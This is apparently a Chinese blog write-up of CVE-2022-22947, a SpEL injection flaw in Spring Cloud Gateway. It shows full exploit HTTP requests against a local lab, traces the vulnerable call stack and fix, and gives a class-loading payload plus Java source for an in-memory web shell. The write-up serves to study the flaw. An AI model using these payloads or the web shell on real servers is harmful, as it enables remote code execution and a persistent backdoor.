CVE-2022-22947 SpringCloud GateWay SpEL RCE

写在前面

学习记录

环境准备

IDEA的话需要下载Kotlin插件的,针对于这个环境的话,Kotlin插件对IDEA的版本有要求,比如IDEA 2020.1.1的版本就不行,搭环境的时候需要注意下。

git clone https://github.com/spring-cloud/spring-cloud-gateway

cd spring-cloud-gateway

git checkout v3.1.0

漏洞复现

0x01 添加filter

POST /actuator/gateway/routes/spel HTTP/1.1

Host: 127.0.0.1:8080

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:98.0) Gecko/20100101 Firefox/98.0

Accept: text/:/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8

Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

Accept-Encoding: gzip, deflate

Connection: close

Upgrade-Insecure-Requests: 1

Sec-Fetch-Dest: document

Sec-Fetch-Mode: navigate

Sec-Fetch-Site: none

Sec-Fetch-User: ?1

Content-Type: application/json

Content-Length: 325

{

  "id": "spel",

  "filters": [{

    "name": "AddResponseHeader",

    "args": {

      "name": "Result",

      "value": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"id\"}).getInputStream()))}"

    }

  }],

  "uri": "http://example.com"

}

0x02 刷新

POST /actuator/gateway/refresh HTTP/1.1

Host: 127.0.0.1:8080

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:98.0) Gecko/20100101 Firefox/98.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8

Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

Accept-Encoding: gzip, deflate

Connection: close

Upgrade-Insecure-Requests: 1

Sec-Fetch-Dest: document

Sec-Fetch-Mode: navigate

Sec-Fetch-Site: none

Sec-Fetch-User: ?1

Content-Type: application/x-www-form-urlencoded

Content-Length: 0

0x03 再次访问

GET /actuator/gateway/routes/spel HTTP/1.1

Host: 127.0.0.1:8080

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:98.0) Gecko/20100101 Firefox/98.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8

Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

Accept-Encoding: gzip, deflate

Connection: close

Upgrade-Insecure-Requests: 1

Sec-Fetch-Dest: document

Sec-Fetch-Mode: navigate

Sec-Fetch-Site: none

Sec-Fetch-User: ?1

漏洞分析

看diff和早就爆出的信息,是SpEL注入导致的代码执行

https://github.com/spring-cloud/spring-cloud-gateway/commit/337cef276bfd8c59fb421bfe7377a9e19c68fe1e

修改的文件为:

spring-cloud-gateway-server/src/main/java/org/springframework/cloud/gateway/support/ShortcutConfigurable.java

进去下断点,先放加filter的包,再refresh,回溯下调用栈

sink点在getValue方法中,而该方法有4处调用,且均在ShortcutType这个枚举类型里

这里有个shortcutType方法,会直接调用ShortcutType.DEFAULT

这点看调用栈中也可以发现,从normalizeProperties方法进入后直接调用了DEFAULT

观察参数,normalizeProperties()方法会传入this.properties,其中保存了前面添加的filters agrs属性中的name和value,最终会将value取出传到后续的SpEL进行解析执行

再往前回溯就是从POST refresh端点到加载这个filter的逻辑了,翻看一下调用栈就一目了然了。调用栈如下:

getValue:59, ShortcutConfigurable (org.springframework.cloud.gateway.support)

normalize:94, ShortcutConfigurable$ShortcutType$1 (org.springframework.cloud.gateway.support)

normalizeProperties:140, ConfigurationService$ConfigurableBuilder (org.springframework.cloud.gateway.support)

bind:241, ConfigurationService$AbstractBuilder (org.springframework.cloud.gateway.support)

loadGatewayFilters:144, RouteDefinitionRouteLocator (org.springframework.cloud.gateway.route)

getFilters:176, RouteDefinitionRouteLocator (org.springframework.cloud.gateway.route)

convertToRoute:117, RouteDefinitionRouteLocator (org.springframework.cloud.gateway.route)

...

onApplicationEvent:81, CachingRouteLocator (org.springframework.cloud.gateway.route)

onApplicationEvent:40, CachingRouteLocator (org.springframework.cloud.gateway.route)

doInvokeListener:176, SimpleApplicationEventMulticaster (org.springframework.context.event)

invokeListener:169, SimpleApplicationEventMulticaster (org.springframework.context.event)

multicastEvent:143, SimpleApplicationEventMulticaster (org.springframework.context.event)

publishEvent:421, AbstractApplicationContext (org.springframework.context.support)

publishEvent:378, AbstractApplicationContext (org.springframework.context.support)

refresh:96, AbstractGatewayControllerEndpoint (org.springframework.cloud.gateway.actuate)

...

而payload中我们构造的filter在后面会被封装为FilterDefinition对象,而FilterDefinition为RouteDefinition中的一个属性,RouteDefinition对象结构大致如下:

到这里第一个POST加路由的payload的构造以及refresh到sink点的触发基本就很清晰了,下面正向看一下这个route是如何加进去的。

首先看官方文档

可以通过POST和DELETE请求进行添加和删除路由的操作

下断点后跟进查看,POST传入的是RouteDefinition对象

RouteDefinition类代码如下

其中filters对应的模版类代码如下,所以需要有name和args作为属性

继续往下跟,在Lambda表达式里调用了validateRouteDefinition方法对当前filter name做了检查,判断是否是存在的filter name,一共有29个,其中用AddResponseHeader可以帮助构造回显

而关于回显的话,前面refresh部分的调试已知了结果会保存在this.properties中,那么拿AddResponseHeader做回显肯定是能获取this.properties,下面来看下。

首先定位到AddResponseHeaderGatewayFilterFactory,其中apply方法会把config的name和value属性都添加到header中从而创造回显。全局搜索的时候也可以看到很多用此功能来添加header头的代码。

而通过GET请求routes/{id}时正好会拿到该命令执行的结果, 这里的话个人感觉是走如下的调用的,

最终在此拿到filter,回显到response里

但实际调试时又有很多不一样的地方,埋坑。

内存马注入

Payload

这里联想到的是Thymeleaf SSTI这个洞,因为这两个洞最终都是SpEL注入,所以一开始想到的就是BCEL去打一个内存马进去,但BCEL是有JDK版本限制,并不是很通用。在c0ny1师傅文章有给出payload和新思路,不造轮子了直接学爆。

首先来看payload

#{T(org.springframework.cglib.core.ReflectUtils).defineClass('Memshell',T(org.springframework.util.Base64Utils).decodeFromString('yv66vgAAA....'),new javax.management.loading.MLet(new java.net.URL[0],T(java.lang.Thread).currentThread().getContextClassLoader())).doInject()}

用的是Spring中自带的ReflectUtils类的defineClass方法,主要注意第三个参数也就是Classloader的部分:new javax.management.loading.MLet(new java.net.URL[0],T(java.lang.Thread).currentThread().getContextClassLoader())).doInject()

可以简单看下源码,MLet继承了URLClassLoader,所以这里通过new MLet()来new一个新的ClassLoader就可以避免ClassLoader无法加载相同类名的类

public class MLet extends java.net.URLClassLoader

     implements MLetMBean, MBeanRegistration, Externalizable {

     ...

     /**

      * Constructs a new MLet using the default delegation parent ClassLoader.

      */

     public MLet() {

         this(new URL[0]);

     }

     /**

      * Constructs a new MLet for the specified URLs using the default

      * delegation parent ClassLoader.  The URLs will be searched in

      * the order specified for classes and resources after first

      * searching in the parent class loader.

      *

      * @param  urls  The URLs from which to load classes and resources.

      *

      */

     public MLet(URL[] urls) {

         this(urls, true);

     }

     /**

      * Constructs a new MLet for the given URLs. The URLs will be

      * searched in the order specified for classes and resources

      * after first searching in the specified parent class loader.

      * The parent argument will be used as the parent class loader

      * for delegation.

      *

      * @param  urls  The URLs from which to load classes and resources.

      * @param  parent The parent class loader for delegation.

      *

      */

     public MLet(URL[] urls, ClassLoader parent) {

         this(urls, parent, true);

     }

     /**

      * Constructs a new MLet for the specified URLs, parent class

      * loader, and URLStreamHandlerFactory. The parent argument will

      * be used as the parent class loader for delegation. The factory

      * argument will be used as the stream handler factory to obtain

      * protocol handlers when creating new URLs.

      *

      * @param  urls  The URLs from which to load classes and resources.

      * @param  parent The parent class loader for delegation.

      * @param  factory  The URLStreamHandlerFactory to use when creating URLs.

      *

      */

     public MLet(URL[] urls,

                 ClassLoader parent,

                 URLStreamHandlerFactory factory) {

         this(urls, parent, factory, true);

     }

    ...

    ...

     /**

      * Constructs a new MLet for the specified URLs, parent class

      * loader, and URLStreamHandlerFactory. The parent argument will

      * be used as the parent class loader for delegation. The factory

      * argument will be used as the stream handler factory to obtain

      * protocol handlers when creating new URLs.

      *

      * @param  urls  The URLs from which to load classes and resources.

      * @param  parent The parent class loader for delegation.

      * @param  factory  The URLStreamHandlerFactory to use when creating URLs.

      * @param  delegateToCLR  True if, when a class is not found in

      * either the parent ClassLoader or the URLs, the MLet should delegate

      * to its containing MBeanServer's {@link ClassLoaderRepository}.

      *

      */

     public MLet(URL[] urls,

                 ClassLoader parent,

                 URLStreamHandlerFactory factory,

                 boolean delegateToCLR) {

         super(urls, parent, factory);

         init(delegateToCLR);

     }

HandlerMapping内存马

而内存马方面的话主要还是Spring层,之前我也有写过一篇Spring内存马相关的文章,主要是Interceptor和Controller型的内存马,而c0ny1师傅文章中用到的是RequestMappingHandlerMapping注册一个与使用@RequestMapping("/*")等效的HandlerMapping类型的内存马。

代码:执行命令的逻辑主要还是在executeCommand方法中,那么想注入Behinder3或者Godzilla4的Memshell的话改下逻辑,并且需要找到获取request对象的姿势。

public class SpringRequestMappingMemshell {

    public static String doInject(Object requestMappingHandlerMapping) {

        String msg = "inject-start";

        try {

            Method registerHandlerMethod = requestMappingHandlerMapping.getClass().getDeclaredMethod("registerHandlerMethod", Object.class, Method.class, RequestMappingInfo.class);

            registerHandlerMethod.setAccessible(true);

            Method executeCommand = SpringRequestMappingMemshell.class.getDeclaredMethod("executeCommand", String.class);

            PathPattern pathPattern = new PathPatternParser().parse("/*");

            PatternsRequestCondition patternsRequestCondition = new PatternsRequestCondition(pathPattern);

            RequestMappingInfo requestMappingInfo = new RequestMappingInfo("", patternsRequestCondition, null, null, null, null, null, null);

            registerHandlerMethod.invoke(requestMappingHandlerMapping, new SpringRequestMappingMemshell(), executeCommand, requestMappingInfo);

            msg = "inject-success";

        }catch (Exception e){

            msg = "inject-error";

        }

        return msg;

    }

    public ResponseEntity executeCommand(String cmd) throws IOException {

        String execResult = new Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A").next();

        return new ResponseEntity(execResult, HttpStatus.OK);

    }

}

漏洞武器化

丢两张图吧

CVE-2022-22947 SpringCloud GateWay SpEL RCE的更多相关文章

  1. CVE-2022-22947 Spring Cloud Gateway SPEL RCE复现

    目录 0 环境搭建 1 漏洞触发点 2 构建poc 3 总结 参考 0 环境搭建 影响范围: Spring Cloud Gateway 3.1.x < 3.1.1 Spring Cloud Ga ...

  2. SpringCloud gateway (史上最全)

    疯狂创客圈 Java 分布式聊天室[ 亿级流量]实战系列之 -25[ 博客园 总入口 ] 前言 ### 前言 疯狂创客圈(笔者尼恩创建的高并发研习社群)Springcloud 高并发系列文章,将为大家 ...

  3. SpringCloud gateway 3

    参考博客:https://www.cnblogs.com/crazymakercircle/p/11704077.html 1.1 SpringCloud Gateway 简介 SpringCloud ...

  4. SpringCloud Gateway 测试问题解决

    本文针对于测试环境SpringCloud Gateway问题解决. 1.背景介绍 本文遇到的问题都是在测试环境真正遇到的问题,不一定试用于所有人,仅做一次记录,便于遇到同样问题的干掉这些问题. 使用版 ...

  5. SpringCloud Gateway入门

    本文是介绍一下SpringCloud Gateway简单路由转发使用. SpringCloud Gateway简介 SpringCloud是基于Spring Framework 5,Project R ...

  6. 使用springcloud gateway搭建网关(分流,限流,熔断)

    Spring Cloud Gateway Spring Cloud Gateway 是 Spring Cloud 的一个全新项目,该项目是基于 Spring 5.0,Spring Boot 2.0 和 ...

  7. SpringCloud Gateway(八)

    搭建SpringCloud Gateway 创建microservicecloud-springcloud-gateway-9528工程 pom文件 依赖: <dependencies> ...

  8. 体验SpringCloud Gateway

    Spring Cloud Gateway是Spring Cloud技术栈中的网关服务,本文实战构建一个SpringCloud环境,并开发一个SpringCloud Gateway应用,快速体验网关服务 ...

  9. spring-cloud-kubernetes与SpringCloud Gateway

    本文是<spring-cloud-kubernetes实战系列>的第五篇,主要内容是在kubernetes上部署一个SpringCloud Gateway应用,该应用使用了spring-c ...

随机推荐

  1. swoole 聊天室

    1:宝塔终端安装php 2:宝塔终端检测是否安装好 php-v 3:宝塔面板安装swoole扩展,终端检测 php -m  查看扩展 扩展已经安装完毕

  2. think php 软删除

    <a href="/admin/exam/delete/id/{$v.id}" onclick="if(confirm('确认删除?')) location.hre ...

  3. nginx 访问php文件报错

    问题图: An error occurred. 解决方法(windows版) php.cgi没有启动 cmd中找到cig.exe 的位置然后运行   php-cgi.exe -b 127.0.0.1: ...

  4. 原生JS添加事件方法

    事件 事件添加方式 EvenTarget.addEventListener(EvenName, functionName, option); EventName: example => clic ...

  5. webug 4.0 打靶笔记-01

    webug 4.0 打靶笔记 1. 显错注入 1.1 访问靶场 1.2 判断注入点 查找一切有参数传入的地方进行测试,注意到有get传参?id=1 猜测后台php中sql语句模板可能为如下几种情况 $ ...

  6. 03 Java的数据类型分为两大类 类型转换 八大基本类型

    数据类型 强类型语言:要求变量的使用要严格符合规定,所有变量都必须先定义后才能使用 Java的数据类型分为两大类 基本类型(primitive type) 数值类型 整数类型 byte占1个字节范围: ...

  7. Tomcat高级配置(应用场景总结及示例)

    前言 本文将解决以下问题: 如何将Linux下任意位置的项目(虚拟目录)部署到tomcat? 如何将项目部署到服务器特定端口? 如何在一个服务器上部署多个web应用? 本例中 系统:Linux ver ...

  8. Windows服务器上搭建Windows2003+IIS+ASP.NET+MSSQL网站

    一.安装IIS服务 1. 选择"开始"→"所有程序"→"管理工具"→"管理您的服务器"菜单命令,启动"添加或删 ...

  9. LCT板子

    粘板子: #include<cstdio> #include<cstring> #include<algorithm> using namespace std; c ...

  10. Java中的软引用、弱引用、虚引用的适用场景以及释放机制

    Java的强引用,软引用,弱引用,虚引用及其使用场景   从 JDK1.2 版本开始,把对象的引用分为四种级别,从而使程序能更加灵活的控制对象的生命周期.这四种级别由高到低依次为:强引用.软引用.弱引 ...